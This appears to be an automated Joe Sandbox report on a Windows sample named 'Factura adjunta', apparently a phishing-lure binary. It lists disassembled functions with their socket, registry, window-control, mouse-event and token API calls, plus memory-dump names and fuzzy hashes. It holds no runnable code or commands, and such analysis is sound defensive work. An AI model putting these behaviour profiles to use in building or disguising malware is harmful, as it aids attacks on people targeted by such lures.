                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend$CreateObjectStockWindow
                            • String ID: Msctls_Progress32
                            • API String ID: 1025951953-3636473452
                            • Opcode ID: cd1b197fab13a7a105581ecaeb7e7433d658b10ce659666aa15f21e2ac169b6d
                            • Instruction ID: f0d3e658af4af030add75354a688be0a03e651587a6a08d19aea585e097ce1f0
                            • Opcode Fuzzy Hash: cd1b197fab13a7a105581ecaeb7e7433d658b10ce659666aa15f21e2ac169b6d
                            • Instruction Fuzzy Hash: 2C118EB2510219BFEF159E64CC85EE77F6DFF48798F014124FA08A2090D7729C21DBA4
                            Function 007D41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 007D41E3
                            • GetProcAddress.KERNEL32(00000000), ref: 007D41EA
                            • RtlEncodePointer.NTDLL(00000000), ref: 007D41F6
                            • RtlDecodePointer.NTDLL(00000001), ref: 007D4213
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                            • String ID: RoInitialize$combase.dll
                            • API String ID: 3489934621-340411864
                            • Opcode ID: f3f38784bee4cc7e853b8aab45eb6ea2b287d83bd062618b88d8e28e3c15bd15
                            • Instruction ID: 42f6a6a54a30271a68fb0fcebe54dac637c977b74c9fa4fd5adff9eef04c2d41
                            • Opcode Fuzzy Hash: f3f38784bee4cc7e853b8aab45eb6ea2b287d83bd062618b88d8e28e3c15bd15
                            • Instruction Fuzzy Hash: 49E01AB0A94304AFEF206BB0EC4DB043AA5B7A0702F905824B625E52A5DBBA80D5CF50
                            Function 007D429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007D41B8), ref: 007D42B8
                            • GetProcAddress.KERNEL32(00000000), ref: 007D42BF
                            • RtlEncodePointer.NTDLL(00000000), ref: 007D42CA
                            • RtlDecodePointer.NTDLL(007D41B8), ref: 007D42E5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                            • String ID: RoUninitialize$combase.dll
                            • API String ID: 3489934621-2819208100
                            • Opcode ID: 727de7a1ce2035181c8e52c3136c234f6f151caf417fb4f3e6e35877701fbc58
                            • Instruction ID: 144b78756bdfbc75c7ffb2a6b54925ab8615e3f3de059bcd0df2626030e8906e
                            • Opcode Fuzzy Hash: 727de7a1ce2035181c8e52c3136c234f6f151caf417fb4f3e6e35877701fbc58
                            • Instruction Fuzzy Hash: 6EE0B678A85324EBEB10AB70EC0DB053AA4B764743F90583AF215E12B5CBB89584CA64
                            Function 00826E17 Relevance: 9.2, APIs: 6, Instructions: 250networkCOMMON
                            Download Yara Rule
                            APIs
                            • __WSAFDIsSet.WS2_32(00000000,?), ref: 00826F14
                            • WSAGetLastError.WS2_32(00000000), ref: 00826F48
                            • htons.WS2_32(?), ref: 00826FFE
                            • inet_ntoa.WS2_32(?), ref: 00826FBB
                              • Part of subcall function 0080AE14: _strlen.LIBCMT ref: 0080AE1E
                              • Part of subcall function 0080AE14: _memmove.LIBCMT ref: 0080AE40
                            • _strlen.LIBCMT ref: 00827058
                            • _memmove.LIBCMT ref: 008270C1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                            • String ID:
                            • API String ID: 3619996494-0
                            • Opcode ID: 650a7fc797f533b75587464e3eb92d1665b2debe89c15274e5d7ec63cdf05959
                            • Instruction ID: f0636a43c18ea4d30d57ea890c558c890db947a7918e67ea878c0d5763db3fd2
                            • Opcode Fuzzy Hash: 650a7fc797f533b75587464e3eb92d1665b2debe89c15274e5d7ec63cdf05959
                            • Instruction Fuzzy Hash: 4581E071508310EBD710EF24DC8AFABB7A9FF84714F10491CF6559B2A2DA74AD44CB92
                            Function 0081675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memmove$__itow__swprintf
                            • String ID:
                            • API String ID: 3253778849-0
                            • Opcode ID: 6369318ef1cbfef12513b9b6e259db3f107f4f6723b18a0a13404d987d40ca24
                            • Instruction ID: 20a8056bef6c5b7b01c453655dc02b8cdfd84a4b70d5f414b6621c9999a3f186
                            • Opcode Fuzzy Hash: 6369318ef1cbfef12513b9b6e259db3f107f4f6723b18a0a13404d987d40ca24
                            • Instruction Fuzzy Hash: ED618C3050025AEBCB11EF64C885BFE3BA8EF44308F444559FA959B292EB38A995CB51
                            Function 0083046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B7F41: _memmove.LIBCMT ref: 007B7F82
                              • Part of subcall function 008310A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00830038,?,?), ref: 008310BC
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00830548
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00830588
                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 008305AB
                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008305D4
                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00830617
                            • RegCloseKey.ADVAPI32(00000000), ref: 00830624
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                            • String ID:
                            • API String ID: 4046560759-0
                            • Opcode ID: 053149430bb5ef4eeefe90e2b8cc8b39cba39da9fa4ed2023bb8e29d61fa3135
                            • Instruction ID: b58f314277d540d36ba98664b9c2ca83ef8a3849ebe7e3a4af7278ddf07103f8
                            • Opcode Fuzzy Hash: 053149430bb5ef4eeefe90e2b8cc8b39cba39da9fa4ed2023bb8e29d61fa3135
                            • Instruction Fuzzy Hash: B4513A31608204EFCB14EF28C899EAABBE8FF84714F04491DF555972A2DB35E915CF92
                            Function 00835A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetMenu.USER32(?), ref: 00835A82
                            • GetMenuItemCount.USER32(00000000), ref: 00835AB9
                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00835AE1
                            • GetMenuItemID.USER32(?,?), ref: 00835B50
                            • GetSubMenu.USER32(?,?), ref: 00835B5E
                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00835BAF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Menu$Item$CountMessagePostString
                            • String ID:
                            • API String ID: 650687236-0
                            • Opcode ID: b6391e48d3c359cc4bea0235a8bbe06a4a66517334ca5dafac992448aa024997
                            • Instruction ID: b6bbdcd25f6aeca168e316a80db730183c3feb5da2f28a7e58d05c55583aa709
                            • Opcode Fuzzy Hash: b6391e48d3c359cc4bea0235a8bbe06a4a66517334ca5dafac992448aa024997
                            • Instruction Fuzzy Hash: BC515C35A00629EFCB11EFA4C845AAEB7B4FF88720F104469E951F7351CB74AE419BD1
                            Function 0080F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 0080F3F7
                            • VariantClear.OLEAUT32(00000013), ref: 0080F469
                            • VariantClear.OLEAUT32(00000000), ref: 0080F4C4
                            • _memmove.LIBCMT ref: 0080F4EE
                            • VariantClear.OLEAUT32(?), ref: 0080F53B
                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0080F569
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Variant$Clear$ChangeInitType_memmove
                            • String ID:
                            • API String ID: 1101466143-0
                            • Opcode ID: c27b748e79ea2b8077bef04241b79cc9147a2b0c07aefa2578ec1a549facc987
                            • Instruction ID: c2b074270581feb8fb2de8a233ff310dd8a06f13a748134edf9acdd06297efc1
                            • Opcode Fuzzy Hash: c27b748e79ea2b8077bef04241b79cc9147a2b0c07aefa2578ec1a549facc987
                            • Instruction Fuzzy Hash: 8D5169B5A00209EFCB20CF58D884AAAB7B8FF4C314B158569EE59DB341D730E911CBA0
                            Function 008126F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00812747
                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00812792
                            • IsMenu.USER32(00000000), ref: 008127B2
                            • CreatePopupMenu.USER32 ref: 008127E6
                            • GetMenuItemCount.USER32(000000FF), ref: 00812844
                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00812875
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                            • String ID:
                            • API String ID: 3311875123-0
                            • Opcode ID: 2970ddb5723c9da0b099dd9d1a3f87461e14a78537e184725f3242b03611a9ca
                            • Instruction ID: cce58eb2385828bca509847be42fc4ae10b7caeaf54e77c2e465bafee78d2ff0
                            • Opcode Fuzzy Hash: 2970ddb5723c9da0b099dd9d1a3f87461e14a78537e184725f3242b03611a9ca
                            • Instruction Fuzzy Hash: 10519E70A0024AEFDF25CF68D888AEEBBF9FF44314F104569E825DB291D77099A4CB51
                            Function 007B1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 007B179A
                            • GetWindowRect.USER32(?,?), ref: 007B17FE
                            • ScreenToClient.USER32(?,?), ref: 007B181B
                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007B182C
                            • EndPaint.USER32(?,?), ref: 007B1876
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                            • String ID:
                            • API String ID: 1827037458-0
                            • Opcode ID: dabf46bf64ecd1f1aa2a56b3b71612af9d0f951c4e93b8b6ee154bca5b73d69e
                            • Instruction ID: de458625351a17ef2075ccb19d666d56bb1507c639d294e159f6b643493cd696
                            • Opcode Fuzzy Hash: dabf46bf64ecd1f1aa2a56b3b71612af9d0f951c4e93b8b6ee154bca5b73d69e
                            • Instruction Fuzzy Hash: 8B41BD70500600AFCB10DF25CC98FBA7BE8FB49734F544639FAA8871A2D7359845DBA2
                            Function 0083B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                            Download Yara Rule
                            APIs
                            • ShowWindow.USER32(008767B0,00000000,00E92968,?,?,008767B0,?,0083B862,?,?), ref: 0083B9CC
                            • EnableWindow.USER32(00000000,00000000), ref: 0083B9F0
                            • ShowWindow.USER32(008767B0,00000000,00E92968,?,?,008767B0,?,0083B862,?,?), ref: 0083BA50
                            • ShowWindow.USER32(00000000,00000004,?,0083B862,?,?), ref: 0083BA62
                            • EnableWindow.USER32(00000000,00000001), ref: 0083BA86
                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0083BAA9
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$Show$Enable$MessageSend
                            • String ID:
                            • API String ID: 642888154-0
                            • Opcode ID: ab2c05f84d6bcab042ff11fb01b3a9d4130a66439d7b933e156d311a91984a91
                            • Instruction ID: dca343560ad5bdf6e7acb759b7f9b90caac324fd505721c08dcd6323c7f27308
                            • Opcode Fuzzy Hash: ab2c05f84d6bcab042ff11fb01b3a9d4130a66439d7b933e156d311a91984a91
                            • Instruction Fuzzy Hash: D2414BB0601651AFDB22CF28D489B957FE0FB85311F1842A9EF48CF2A2D731E845CB91
                            Function 008273B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32(?,?,?,?,?,?,00825134,?,?,00000000,00000001), ref: 008273BF
                              • Part of subcall function 00823C94: GetWindowRect.USER32(?,?), ref: 00823CA7
                            • GetDesktopWindow.USER32 ref: 008273E9
                            • GetWindowRect.USER32(00000000), ref: 008273F0
                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00827422
                              • Part of subcall function 008154E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0081555E
                            • GetCursorPos.USER32(?), ref: 0082744E
                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008274AC
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                            • String ID:
                            • API String ID: 4137160315-0
                            • Opcode ID: 8b86444a11e08c072c0479df59744783af57a9c2f7fcc84892ffd367bb438c17
                            • Instruction ID: 52b4f67b5e418891783a513f11c2dc5932807ef956630f618032b47ccd54674d
                            • Opcode Fuzzy Hash: 8b86444a11e08c072c0479df59744783af57a9c2f7fcc84892ffd367bb438c17
                            • Instruction Fuzzy Hash: 6631B272509315ABD720EF54D849E9BBBA9FFC8314F000919F589D7192D730EA48CBD6
                            Function 0080E0B5 Relevance: 9.1, APIs: 6, Instructions: 90memoryCOMMON
                            Download Yara Rule
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0080E0FA
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0080E120
                            • SysAllocString.OLEAUT32(00000000), ref: 0080E123
                            • SysAllocString.OLEAUT32 ref: 0080E144
                            • SysFreeString.OLEAUT32 ref: 0080E14D
                            • SysAllocString.OLEAUT32(?), ref: 0080E175
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: String$Alloc$ByteCharMultiWide$Free
                            • String ID:
                            • API String ID: 1313759350-0
                            • Opcode ID: 95323abf7ceb94b035470042c66030ff23c2a6697d0dcfc3edbf0f1439a172f7
                            • Instruction ID: d1c5e33bc725f5d33a60a028395b58cda55921308b10b492d96fd55da4deb7ed
                            • Opcode Fuzzy Hash: 95323abf7ceb94b035470042c66030ff23c2a6697d0dcfc3edbf0f1439a172f7
                            • Instruction Fuzzy Hash: DE217135604108AFDB50AFA8DC88DAB77ECFF49760B108535FA55CB2A1DA74DC418BA4
                            Function 0081ED8E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 323COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B9997: __itow.LIBCMT ref: 007B99C2
                              • Part of subcall function 007B9997: __swprintf.LIBCMT ref: 007B9A0C
                              • Part of subcall function 007CFEC6: _wcscpy.LIBCMT ref: 007CFEE9
                            • _wcstok.LIBCMT ref: 0081EEFF
                            • _wcscpy.LIBCMT ref: 0081EF8E
                            • _memset.LIBCMT ref: 0081EFC1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                            • String ID: X
                            • API String ID: 774024439-3081909835
                            • Opcode ID: 3f71c7a8b959e2bd8f73eb14f63a0c7a3bd77536eb9d49844057a99b17e3efee
                            • Instruction ID: d96387cfb74ae213df91833047127487220c0339d8a216ff255b2fe0f01efa42
                            • Opcode Fuzzy Hash: 3f71c7a8b959e2bd8f73eb14f63a0c7a3bd77536eb9d49844057a99b17e3efee
                            • Instruction Fuzzy Hash: 43C12A71508700DFC725EF24C889A9AB7E8FF84310F04496DF999DB2A2DB34E945CB92
                            Function 00808D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 008085F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00808608
                              • Part of subcall function 008085F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00808612
                              • Part of subcall function 008085F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00808621
                              • Part of subcall function 008085F1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00808628
